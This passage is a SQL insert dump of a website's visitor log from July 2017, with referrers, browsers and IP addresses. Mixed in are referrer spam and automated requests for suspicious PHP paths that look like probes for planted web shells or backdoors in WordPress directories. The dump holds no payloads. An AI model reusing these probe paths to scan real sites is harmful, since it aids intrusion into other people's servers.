34','000',2,0),(7366,'2017-07-14','http://zphiblgz.org','Firefox','Windows','40.1','','115.134.3.209','000',2,0),(7367,'2017-07-14','http://zphiblgz.org','Firefox','Windows','40.1','','177.18.99.134','000',1,0),(7368,'2017-07-15','http://zphiblgz.org','MSIE','Windows','7.0','','38.100.21.62','000',1,0),(7369,'2017-07-15','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',3,0),(7370,'2017-07-15','http://uptime-alpha.net/zphiblgz.org','Unknown','Unknown','Unknown','','199.58.164.133','000',1,0),(7371,'2017-07-15','http://zphiblgz.org','Firefox','Windows','40.1','','39.35.63.242','000',2,0),(7372,'2017-07-15','http://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.34.177','000',1,0),(7373,'2017-07-15','http://zphiblgz.org','Unknown','Unknown','Unknown','','169.54.244.89','000',1,0),(7374,'2017-07-15','http://zphiblgz.org','Chrome','Windows','10.0.648.204','','198.240.122.58','000',1,0),(7375,'2017-07-15','https://www.facebook.com/businesses.center/','Opera','Windows','9.00','','178.137.4.41','000',1,0),(7376,'2017-07-15','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','62.210.203.161','000',2,0),(7377,'2017-07-15','http://zphiblgz.org','Firefox','Windows','29.0','','138.197.111.108','000',2,0),(7378,'2017-07-15','http://zphiblgz.org','Firefox','Windows','40.1','','108.53.58.196','000',1,0),(7379,'2017-07-15','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.255.196.218','000',2,0),(7380,'2017-07-15','http://podshipniki-nsk.ru/','MSIE','Windows','5.0','','178.137.4.41','000',3,0),(7381,'2017-07-15','http://zphiblgz.org','Firefox','Windows','40.1','','197.207.152.189','000',2,0),(7382,'2017-07-15','https://via-energy-cumpara.com/','MSIE','Windows','6.0','','46.119.116.109','000',3,0),(7383,'2017-07-15','http://remontvsamare.su/','Unknown','Unknown','Unknown','','46.118.124.89','000',2,0),(7384,'2017-07-15','http://uptime-gamma.net/zphiblgz.org','Unknown','Unknown','Unknown','','216.169.110.221','000',1,0),(7385,'2017-07-15','http://zphiblgz.org/','Firefox','Windows','53.0','','37.147.108.24','000',1,0),(7386,'2017-07-15','http://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(7387,'2017-07-15','http://zphiblgz.org','Unknown','Unknown','Unknown','','169.54.233.125','000',3,0),(7388,'2017-07-15','http://zphiblgz.org','Firefox','Windows','40.1','','160.202.39.254','000',2,0),(7389,'2017-07-15','http://zphiblgz.org','Firefox','Windows','40.1','','103.255.4.58','000',2,0),(7390,'2017-07-15','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',2,0),(7391,'2017-07-15','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',4,0),(7392,'2017-07-15','http://zphiblgz.org','Firefox','Windows','38.0','','195.22.127.227','000',2,0),(7393,'2017-07-15','https://www.google.com/','Safari','iPhone','10.0','','75.120.65.188','000',1,0),(7394,'2017-07-15','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.175.131.194','000',2,0),(7395,'2017-07-15','http://smsactivator.ru/','Opera','Windows','8.01','','188.163.75.37','000',3,0),(7396,'2017-07-15','http://zphiblgz.org','Firefox','Windows','40.1','','121.215.204.89','000',1,0),(7397,'2017-07-15','http://zphiblgz.org','Firefox','Windows','40.1','','84.108.96.125','000',1,0),(7398,'2017-07-15','https://www.google.com/','Safari','iPhone','10.0','','172.9.124.35','000',1,0),(7399,'2017-07-15','http://zphiblgz.org','Firefox','Windows','40.1','','88.77.177.249','000',1,0),(7400,'2017-07-15','http://uptime-beta.net/zphiblgz.org','Unknown','Unknown','Unknown','','199.58.164.132','000',1,0),(7401,'2017-07-15','http://zphiblgz.org','Firefox','Windows','7.0.1','','109.163.234.9','000',2,0),(7402,'2017-07-15','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.168','000',2,0),(7403,'2017-07-15','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','95.211.38.161','000',1,0),(7404,'2017-07-15','http://zphiblgz.org','curl','Unknown','7.47.0','','95.211.38.161','000',1,0),(7405,'2017-07-15','http://zphiblgz.org','Firefox','Windows','40.1','','146.198.247.151','000',1,0),(7406,'2017-07-15','http://zphiblgz.org','Firefox','Windows','40.1','','77.29.33.155','000',1,0),(7407,'2017-07-15','https://vk.com/vps_vds_dedicated_server','MSIE','Windows','6.0','','37.229.253.71','000',3,0),(7408,'2017-07-15','http://kirov.zrus.org/','MSIE','Windows','6.0','','46.118.125.174','000',3,0),(7409,'2017-07-15','http://zphiblgz.org','Chrome','Windows','57.0.2987.110','','46.229.170.197','000',1,0),(7410,'2017-07-15','http://zphiblgz.org','Chrome','Macintosh','56.0.2924.87','','46.229.170.197','000',1,0),(7411,'2017-07-15','http://www.wttavern.com/','MSIE','Windows','6.0','','188.163.75.37','000',3,0),(7412,'2017-07-16','http://videochat.world/','Opera','Windows','8.00','','46.118.125.174','000',2,0),(7413,'2017-07-16','http://zphiblgz.org','Firefox','Linux','3.6.4','','188.165.233.228','000',2,0),(7414,'2017-07-16','http://zphiblgz.org','Firefox','Windows','40.1','','202.160.16.213','000',1,0),(7415,'2017-07-16','http://khantymansiysk.zrus.org/','MSIE','Windows','6.0','','46.118.125.174','000',6,0),(7416,'2017-07-16','http://zphiblgz.org/wp-content/themes/twentythirteen/system.php','Chrome','Windows','5.0.375.99','','198.57.247.171','000',1,0),(7417,'2017-07-16','http://zphiblgz.org/wp-content/plugins/wp-db-ajax-made/xml_rpc.class.php','Chrome','Windows','5.0.375.99','','178.210.90.90','000',1,0),(7418,'2017-07-16','http://zphiblgz.org/changelog.php','Chrome','Windows','5.0.375.99','','213.251.182.113','000',1,0),(7419,'2017-07-16','http://kinoplen.ru/','Unknown','Unknown','Unknown','','188.163.75.37','000',3,0),(7420,'2017-07-16','http://nac-bearings.ru/','MSIE','Windows','6.0','','188.163.75.37','000',3,0),(7421,'2017-07-16','http://zphiblgz.org/wp-admin/image-true.php','Chrome','Windows','5.0.375.99','','78.46.190.58','000',1,0),(7422,'2017-07-16','http://zphiblgz.org','Firefox','Windows','7.0.1','','37.139.8.104','000',1,0),(7423,'2017-07-16','http://zphiblgz.org/','Firefox','Windows','7.0.1','','78.109.23.1','000',1,0),(7424,'2017-07-16','http://zphiblgz.org/content-wrapper.php','Chrome','Windows','5.0.375.99','','79.137.37.130','000',1,0),(7425,'2017-07-16','http://www.zphiblgz.org','Chrome','Windows','49.0.2600.0','','34.212.74.63','000',3,0),(7426,'2017-07-16','http://zphiblgz.org/wp-includes/class-wp-common.php','Chrome','Windows','5.0.375.99','','108.167.157.107','000',1,0),(7427,'2017-07-16','http://uptime-alpha.net/zphiblgz.org','Unknown','Unknown','Unknown','','96.47.226.20','000',1,0),(7428,'2017-07-16','http://zphiblgz.org/css.php','Chrome','Windows','42.0.2311.152','','195.154.251.162','000',1,0),(7429,'2017-07-16','http://zphiblgz.org','Firefox','Windows','40.1','','184.161.7.217','000',1,0),(7430,'2017-07-16','http://fr-bearings.ru/','MSIE','Windows','6.0','','46.118.124.89','000',2,0),(7431,'2017-07-16','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',2,0),(7432,'2017-07-16','https://i-hobot.ru/','MSIE','Windows','6.0','','46.119.116.109','000',3,0),(7433,'2017-07-16','http://zphiblgz.org','Firefox','Windows','7.0.1','','155.4.230.97','000',1,0),(7434,'2017-07-16','http://zphiblgz.org/content-wrapper.php','Chrome','Windows','5.0.375.99','','64.71.32.30','000',1,0),(7435,'2017-07-16','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.168','000',2,0),(7436,'2017-07-16','https://www.google.com/','Safari','iPhone','10.0','','174.205.19.232','000',4,0),(7437,'2017-07-16','http://zphiblgz.org','Firefox','Windows','40.1','','222.101.102.19','000',1,0),(7438,'2017-07-16','http://zphiblgz.org','Firefox','Windows','7.0.1','','198.50.158.140','000',2,0),(7439,'2017-07-16','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',4,0),(7440,'2017-07-16','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',3,0),(7441,'2017-07-16','http://zphiblgz.org/wp-includes/text/diff/engine/engine.php','Chrome','Windows','5.0.375.99','','67.211.37.229','000',1,0),(7442,'2017-07-16','http://zphiblgz.org/wp-content/plugins/wp-db-ajax-made/slide-menues.php','Chrome','Windows','5.0.375.99','','185.23.21.12','000',1,0),(7443,'2017-07-16','http://uptime-alpha.net/zphiblgz.org','Unknown','Unknown','Unknown','','96.47.226.19','000',1,0),(7444,'2017-07-16','http://hdwallpapers-free.com/','MSIE','Windows','6.0','','178.137.4.41','000',2,0),(7445,'2017-07-16','http://zphiblgz.org','Firefox','Windows','40.1','','178.174.139.86','000',1,0),(7446,'2017-07-16','http://zphiblgz.org','Safari','iPhone','10.0','','73.128.242.163','000',4,0),(7447,'2017-07-16','http://zphiblgz.org','Magic','Unknown','Unknown','','35.162.70.167','000',1,0),(7448,'2017-07-16','http://www.zphiblgz.org','MSIE','Windows','10.0','','138.197.104.8','000',4,0),(7449,'2017-07-16','http://zphiblgz.org','Firefox','Windows','28.0','','138.197.104.8','000',2,0),(7450,'2017-07-16','http://zphiblgz.org','Chrome','Windows','34.0.1847.131','','138.197.104.8','000',1,0),(7451,'2017-07-16','http://zphiblgz.org','Firefox','Windows','29.0','','138.197.104.8','000',1,0),(7452,'2017-07-16','http://zphiblgz.org','Safari','Macintosh','7.0.3','','138.197.104.8','000',3,0),(7453,'2017-07-16','http://videochat.bz/','MSIE','Windows','5.0','','46.118.124.89','000',2,0),(7454,'2017-07-16','http://chatroulette.online/','MSIE','Unknown','6.0','','46.118.124.89','000',2,0),(7455,'2017-07-16','https://vk.com/vps_vds_dedicated_server','MSIE','Windows','6.0','','37.229.253.71','000',3,0),(7456,'2017-07-16','http://zphiblgz.org','Firefox','Windows','40.1','','122.173.156.59','000',2,0),(7457,'2017-07-17','http://zphiblgz.org','MSIE','Windows','11.0','','192.187.123.162','000',4,0),(7458,'2017-07-17','http://uptime-delta.net/zphiblgz.org','Unknown','Unknown','Unknown','','96.47.226.20','000',1,0),(7459,'2017-07-17','http://www.vizitki.net/','Unknown','Unknown','Unknown','','46.119.116.109','000',3,0),(7460,'2017-07-17','https://stop-gepatit.te.ua/','Opera','Windows','8.01','','178.137.4.41','000',3,0),(7461,'2017-07-17','http://zphiblgz.org','Chrome','Linux','5.0.342.1','','188.165.234.52','000',88,0),(7462,'2017-07-17','http://pornolook.net/','Opera','Windows','7.11','','46.119.116.109','000',3,0),(7463,'2017-07-17','http://zphiblgz.org','Firefox','Windows','40.1','','183.83.94.220','000',1,0),(7464,'2017-07-17','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',2,0),(7465,'2017-07-17','http://zphiblgz.org','Firefox','Windows','1.0.7','','54.68.12.37','000',1,0),(7466,'2017-07-17','http://remontvsamare.su/','MSIE','Windows','6.0','','46.118.124.89','000',3,0),(7467,'2017-07-17','http://zphiblgz.org','Firefox','Windows','40.1','','103.217.166.130','000',2,0),(7468,'2017-07-17','http://zphiblgz.org','Firefox','Windows','40.1','','86.201.8.81','000',2,0),(7469,'2017-07-17','http://zphiblgz.org','Firefox','Windows','7.0.1','','69.162.123.166','000',2,0),(7470,'2017-07-17','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.151.47','000',2,0),(7471,'2017-07-17','http://zphiblgz.org','Firefox','Windows','40.1','','41.227.199.45','000',2,0),(7472,'2017-07-17','http://zphiblgz.org','Firefox','Windows','7.0.1','','94.242.246.24','000',2,0),(7473,'2017-07-17','http://zphiblgz.org/wp-content/plugins/wp-db-ajax-made/ui-elements.php','Chrome','Windows','5.0.375.99','','192.185.4.108','000',1,0),(7474,'2017-07-17','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.87.154.255','000',2,0),(7475,'2017-07-17','http://zphiblgz.org/wp-content/plugins/wp-db-ajax-made/news_parser.class.php','Chrome','Windows','5.0.375.99','','87.229.69.165','000',1,0),(7476,'2017-07-17','http://www.zphiblgz.org/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php','Chrome','Windows','42.0.2311.152','','209.90.225.227','000',1,0),(7477,'2017-07-17','http://zphiblgz.org','Firefox','Windows','7.0.1','','18.248.2.85','000',2,0),(7478,'2017-07-17','http://zphiblgz.org','Chrome','Windows','34.0.1847.116','','188.226.129.55','000',1,0),(7479,'2017-07-17','http://zphiblgz.org/wp-content/plugins/wp-db-ajax-made-1/wp-ajax.php','Chrome','Windows','5.0.375.99','','87.242.64.217','000',1,0),(7480,'2017-07-17','http://zphiblgz.org/maint/popup-pomo.php','Chrome','Windows','5.0.375.99','','185.107.214.134','000',1,0),(7481,'2017-07-17','http://zphiblgz.org','AppleWebKit','Macintosh','603.2.5','','8.21.241.165','000',1,0),(7482,'2017-07-17','http://zphiblgz.org','Safari','iPhone','10.0','','8.21.241.165','000',1,0),(7483,'2017-07-17','http://zphiblgz.org','Firefox','Windows','7.0.1','','217.182.76.240','000',2,0),(7484,'2017-07-17','http://zphiblgz.org','Unknown','Unknown','Unknown','','54.68.12.37','000',1,0),(7485,'2017-07-17','http://zphiblgz.org','Chrome','Windows','59.0.3071.104','','214.36.0.135','000',3,0),(7486,'2017-07-17','http://zphiblgz.org','Firefox','Windows','7.0.1','','89.32.127.178','000',1,0),(7487,'2017-07-17','http://zphiblgz.org/','Firefox','Windows','7.0.1','','162.247.72.216','000',1,0),(7488,'2017-07-17','http://zphiblgz.org','Firefox','Windows','7.0.1','','95.211.230.94','000',2,0),(7489,'2017-07-17','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',2,0),(7490,'2017-07-17','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',4,0),(7491,'2017-07-17','http://zphiblgz.org','Firefox','Windows','40.1','','5.12.157.50','000',1,0),(7492,'2017-07-17','http://zphiblgz.org','Firefox','Windows','7.0.1','','83.220.177.34','000',1,0),(7493,'2017-07-17','http://zphiblgz.org','curl','Linux','7.19.7','','192.99.88.236','000',1,0),(7494,'2017-07-17','http://zphiblgz.org/','Chrome','Windows','58.0.3029.81','','163.172.4.153','000',1,0),(7495,'2017-07-17','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.170.42.4','000',2,0),(7496,'2017-07-17','http://uptime-gamma.net/zphiblgz.org','Unknown','Unknown','Unknown','','216.169.110.221','000',2,0),(7497,'2017-07-17','http://zphiblgz.org','Firefox','Windows','40.1','','78.180.191.213','000',1,0),(7498,'2017-07-17','http://zphiblgz.org','Firefox','Windows','40.1','','123.231.123.46','000',1,0),(7499,'2017-07-17','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.210.115.87','000',1,0),(7500,'2017-07-17','http://zphiblgz.org/','Firefox','Windows','7.0.1','','51.15.40.233','000',1,0),(7501,'2017-07-17','http://zphiblgz.org','Firefox','Windows','7.0.1','','216.218.134.12','000',1,0),(7502,'2017-07-17','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.129.62.62','000',1,0),(7503,'2017-07-17','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.223.81','000',2,0),(7504,'2017-07-17','http://zphiblgz.org','Firefox','Windows','43.0','','104.144.19.159','000',2,0),(7505,'2017-07-17','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1485.dqZibzSzP3VJlkFeYG22xp636oemf9RDHdc7CZr0Ml-XGjE9umKnu5lmPUPA7id3.20ac78f9f325f8de869eab2206b1764bc135a975&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YL_nDC5hqtEQ6WayFoZKRZE&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSjNsQ3ExSG1LU0J6OGs1UUlRaDdjNlZITUp3X05fOEtJNmJrMUVTVGFyd0kxSFVvSUVuMzEx&b64e=2&sign=4e9907e322bd4e3cc5f52edb348ce24f&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQaYgAYq7JarrCgpb8tnqGgOnOL2OwJNCBEgbVn9u9QCAIKVZe1j9wyhFgrL1SV4PU6b-qMbxfemTGCtRyrhjLlilYfhiBUYpqmDs96DoiknvjOZQiWAsN-3IZw5HqhmGqw921jbK73bm&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCW5ri5MzTNSEsyhHF66so8P1bzn9sYLKQjRSgrkM6qfZPnFx-QzyNdk5V_F0Xvdd-Uoi_B69h-L1g&l10n=ru&cts=1500343919217&mc=3.79765084206','Opera Next','Windows','46.0.2597.39','','46.148.224.159','000',1,0),(7506,'2017-07-17','https://www.google.com/','Safari','iPhone','10.0','','173.79.47.92','000',4,0),(7507,'2017-07-17','http://zphiblgz.org','Unknown','Unknown','Unknown','','169.54.233.121','000',3,0),(7508,'2017-07-17','http://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.37','000',1,0),(7509,'2017-07-17','http://greenzaim.ru/','Opera','Windows','7.54','','46.118.125.174','000',1,0),(7510,'2017-07-17','http://zphiblgz.org','Firefox','Windows','40.1','','130.105.234.61','000',1,0),(7511,'2017-07-17','http://life-instyle.com/architectural-design.html','MSIE','Windows','6.0','','188.163.75.37','000',2,0),(7512,'2017-07-18','http://yoshkarola.zrus.org/','Unknown','Unknown','Unknown','','46.118.125.174','000',1,0),(7513,'2017-07-18','http://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.9','000',1,0),(7514,'2017-07-18','https://dellalimov.com/','Opera','Windows','7.54','','46.118.125.174','000',2,0),(7515,'2017-07-18','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.205','000',2,0),(7516,'2017-07-18','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',2,0),(7517,'2017-07-18','http://zphiblgz.org/wp-content/themes/avada/content-wrapper.php','Chrome','Windows','5.0.375.99','','37.17.224.15','000',1,0),(7518,'2017-07-18','http://zphiblgz.org','Firefox','Windows','2.0.0.11','','47.187.247.66','000',3,0),(7519,'2017-07-18','http://uptime-gamma.net/zphiblgz.org','Unknown','Unknown','Unknown','','216.169.110.212','000',1,0),(7520,'2017-07-18','http://zphiblgz.org','Firefox','Windows','1.0.7','','54.218.106.56','000',1,0),(7521,'2017-07-18','https://i-hobot.ru/','Opera','Windows','9.01','','46.119.116.109','000',1,0),(7522,'2017-07-18','http://se-welding.ru/','Opera','Windows','7.11','','46.118.124.89','000',1,0),(7523,'2017-07-18','http://zphiblgz.org','Firefox','Windows','40.1','','83.58.149.82','000',1,0),(7524,'2017-07-18','http://zphiblgz.org','Firefox','Windows','7.0.1','','216.176.186.131','000',2,0),(7525,'2017-07-18','http://zphiblgz.org','Firefox','Windows','40.1','','110.227.76.172','000',2,0),(7526,'2017-07-18','http://zphiblgz.org','Chrome','Windows','27.0.1453.90','','5.9.106.81','000',1,0),(7527,'2017-07-18','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.105.100.149','000',2,0),(7528,'2017-07-18','http://zphiblgz.org','Firefox','Windows','40.1','','177.133.59.207','000',1,0),(7529,'2017-07-18','http://zphiblgz.org','Firefox','Windows','7.0.1','','79.134.234.247','000',4,0),(7530,'2017-07-18','http://zphiblgz.org','Chrome','Macintosh','49.0.2623.87','','104.129.192.69','000',1,0),(7531,'2017-07-18','http://shymkent.xkaz.org/','MSIE','Windows','7.0b','','46.119.116.109','000',1,0),(7532,'2017-07-18','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.17.97.112','000',2,0),(7533,'2017-07-18','https://pregnant.guru/','MSIE','Windows','6.0','','188.163.75.37','000',1,0),(7534,'2017-07-18','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1486.sAxhkzYZs5pMqkEnfU3mZ-MJMy-To2tO8FWU_Z9fziPqPrYvj0wDGtM0M7aTLTs4.fde11284ec5b5c21444891258411849c265cd494&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YHRNgn3KsbHJbmUkku86_mY&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSjNsQ3ExSG1LU0I4U3lxbm9aNWtNT2xIeVpLQkRsWjI3RzBKTEhpSUV0bXBpUGhWRURDN2g5&b64e=2&sign=376e1dd9c42c78e0b8791530109e4ff1&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQSaYtyyri96FPf1_cziChxd8kZZ00ZPMKKqAwXMpqqDwLcXNWGBDt_uRk7nUEqB9hbUXbXdE1uMlG8UaTBgobCBp3ZXONdTVZga1nb83qCucxiHVEMHGuOrECnCkPm22wA&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCWuAUzT58TqARkom4jPc1hNYT7coBgzX9C6pf8NMiLdCudTDqDxsOGEVTzFPthk2B1yHDHU3Svq9Q&l10n=ru&cts=1500387585850&mc=5.08171993091','Firefox','Windows','53.0','','46.188.34.111','000',1,0),(7535,'2017-07-18','http://zphiblgz.org','MSIE','Windows','6.0','','31.184.243.234','000',1,0),(7536,'2017-07-18','http://www.z-master.ru/','MSIE','Windows','6.0','','37.229.253.71','000',3,0),(7537,'2017-07-18','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.238.169.131','000',2,0),(7538,'2017-07-18','http://zphiblgz.org/mxl.php','Chrome','Windows','42.0.2311.152','','195.154.251.162','000',1,0),(7539,'2017-07-18','http://zphiblgz.org','Firefox','Windows','7.0.1','','89.34.237.101','000',1,0),(7540,'2017-07-18','http://zphiblgz.org/','Firefox','Windows','7.0.1','','176.126.252.11','000',1,0),(7541,'2017-07-18','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',3,0),(7542,'2017-07-18','http://www.zphiblgz.org','MSIE','Windows','9.0','','184.154.36.185','000',3,0),(7543,'2017-07-18','http://zphiblgz.org','Safari','Macintosh','7.0.3','','138.197.65.174','000',2,0),(7544,'2017-07-18','http://zphiblgz.org','Firefox','Windows','7.0.1','','80.67.172.162','000',4,0),(7545,'2017-07-18','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.117.215.9','000',2,0),(7546,'2017-07-18','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.90.12.87','000',2,0),(7547,'2017-07-18','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.169.135.133','000',2,0),(7548,'2017-07-18','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.212.73.141','000',2,0),(7549,'2017-07-18','http://zphiblgz.org/wp-includes/system_info.php','Chrome','Windows','5.0.375.99','','192.185.4.113','000',1,0),(7550,'2017-07-18','http://zphiblgz.org','Chrome','Windows','43.0.2357.134','','88.99.27.172','000',1,0),(7551,'2017-07-18','http://videochat.ph/','MSIE','Windows','6.0','','46.118.124.89','000',4,0),(7552,'2017-07-18','http://zphiblgz.org','Unknown','Unknown','Unknown','','158.85.81.125','000',1,0),(7553,'2017-07-18','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.201','000',2,0),(7554,'2017-07-18','http://podshipniki-nsk.ru/','MSIE','Windows','6.0','','178.137.4.41','000',3,0),(7555,'2017-07-18','http://zphiblgz.org','MSIE','Windows','6.0','','92.255.99.128','000',1,0),(7556,'2017-07-18','https://www.google.com/','Safari','iPhone','10.0','','172.56.14.236','000',1,0),(7557,'2017-07-18','http://zphiblgz.org','Firefox','Windows','40.1','','180.190.43.107','000',1,0),(7558,'2017-07-18','http://zphiblgz.org/system_info.php','Chrome','Windows','5.0.375.99','','91.206.200.211','000',1,0),(7559,'2017-07-18','http://zphiblgz.org','Firefox','Windows','7.0.1','','78.109.23.1','000',2,0),(7560,'2017-07-18','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1487.ZijCruiDQP0D7CxSYtBx6_HtwkoDAaMF93kGsvMwgR48ala71xSD-lx_OpEaLDbw.01c9b98e15624d4f2282a95f15a9f4fe431d1d16&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YLeQVNu7TCjFWhspMNrg36Y&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSjNsQ3ExSG1LU0IzaHh3eG5TLTI0VEw0bUdaajViR29mTXlSUFBqOGtISjI4UDk4dWF4Nl9D&b64e=2&sign=498b518c9cbdb2edd303c79f8608ceba&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYuwSQLovbTTo0CWLf_2mt-lRh_Un8-FcDu_E-6bUp_YWzqx7RmiNCZYKhpEPwCkK6GW4S_vsRe-ils4hofNp0byAG3dqqUC9hIW2Zw2nGt0oNO_2EAlb6PoprFkZ7amyw&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCX9U1h5sqoIO336aE3d0kqBnbHNFpItdXOe-SdLUCDqzZVf6o-nDRJ0Y35wohcAwfaIwhDGlCWciw&l10n=ru&cts=1500436993534&mc=6.46902925309','Firefox','Windows','53.0','','128.75.30.39','000',1,0),(7561,'2017-07-19','https://via-energy-acquistare.com/','Opera','Windows','9.00','','46.119.116.109','000',3,0),(7562,'2017-07-19','http://zphiblgz.org','Firefox','Windows','40.1','','121.140.254.139','000',1,0),(7563,'2017-07-19','http://zphiblgz.org','Firefox','Windows','7.0.1','','23.249.130.116','000',1,0),(7564,'2017-07-19','http://zphiblgz.org','AppleWebKit','Linux','534.34','','54.81.25.173','000',3,0),(7565,'2017-07-19','http://stal-rulon.ru/','MSIE','Windows','6.0','','46.118.124.89','000',2,0),(7566,'2017-07-19','http://zphiblgz.org','Chrome','Macintosh','44.0.2403.89','','54.186.161.129','000',2,0),(7567,'2017-07-19','https://www.bing.com/','Edge','Windows','14.14393','','69.140.21.192','000',7,0),(7568,'2017-07-19','http://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.34.177','000',1,0),(7569,'2017-07-19','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',2,0),(7570,'2017-07-19','http://zphiblgz.org','Chrome','Windows','34.0.1847.137','','54.188.91.64','000',1,0),(7571,'2017-07-19','http://zphiblgz.org','Firefox','Windows','7.0.1','','164.132.106.162','000',2,0),(7572,'2017-07-19','http://zphiblgz.org','Firefox','Windows','40.1','','101.50.118.56','000',2,0),(7573,'2017-07-19','http://zphiblgz.org','Firefox','Windows','21.0','','5.9.94.207','000',1,0),(7574,'2017-07-19','http://zphiblgz.org','Firefox','Windows','7.0.1','','89.144.12.15','000',2,0),(7575,'2017-07-19','https://xn--d1aifoe0a9a.top/','Unknown','Unknown','Unknown','','46.119.127.63','000',3,0),(7576,'2017-07-19','http://zphiblgz.org','Unknown','Unknown','Unknown','','41.141.131.118','000',1,0),(7577,'2017-07-19','http://zphiblgz.org','Firefox','Windows','7.0.1','','108.56.199.13','000',2,0),(7578,'2017-07-19','http://zphiblgz.org','Firefox','Windows','7.0.1','','207.244.70.35','000',2,0),(7579,'2017-07-19','http://zphiblgz.org/logo_img.php','Chrome','Windows','5.0.375.99','','213.251.182.103','000',1,0),(7580,'2017-07-19','http://zphiblgz.org/wp-admin/system_info.php','Chrome','Windows','5.0.375.99','','174.136.12.174','000',1,0),(7581,'2017-07-19','http://zphiblgz.org','Firefox','Windows','7.0.1','','92.222.134.129','000',1,0),(7582,'2017-07-19','http://zphiblgz.org/','Firefox','Windows','7.0.1','','46.101.139.248','000',1,0),(7583,'2017-07-19','http://www.sexybang.top/','Chrome','Windows','56.0.2924.87','','185.36.102.114','000',2,0),(7584,'2017-07-19','http://zphiblgz.org','Firefox','Windows','7.0.1','','65.19.167.131','000',2,0),(7585,'2017-07-19','http://zphiblgz.org','SafeDNSBot','Unknown','Unknown','','146.185.132.173','000',5,0),(7586,'2017-07-19','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',2,0),(7587,'2017-07-19','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',2,0),(7588,'2017-07-19','https://2000k.ru/','MSIE','Windows','6.0','','178.137.4.41','000',1,0),(7589,'2017-07-19','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.53.134','000',2,0),(7590,'2017-07-19','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.17.174.32','000',2,0),(7591,'2017-07-19','http://zphiblgz.org','MSIE','Windows','11.0','','137.200.32.38','000',2,0),(7592,'2017-07-19','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.170','000',1,0),(7593,'2017-07-19','http://zphiblgz.org/','Firefox','Windows','7.0.1','','163.172.101.137','000',1,0),(7594,'2017-07-19','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.17.170.195','000',2,0),(7595,'2017-07-19','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.169','000',2,0),(7596,'2017-07-19','http://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.51','000',1,0),(7597,'2017-07-19','http://zphiblgz.org/','Firefox','Windows','43.0','','47.89.41.164','000',1,0),(7598,'2017-07-19','http://zphiblgz.org/','Firefox','Windows','43.0','','189.26.118.84','000',2,0),(7599,'2017-07-19','http://zphiblgz.org','Chrome','Android','59.0.3071.125','','96.244.203.215','000',1,0),(7600,'2017-07-19','http://zphiblgz.org','Firefox','Windows','40.1','','59.96.22.211','000',1,0),(7601,'2017-07-19','http://zphiblgz.org'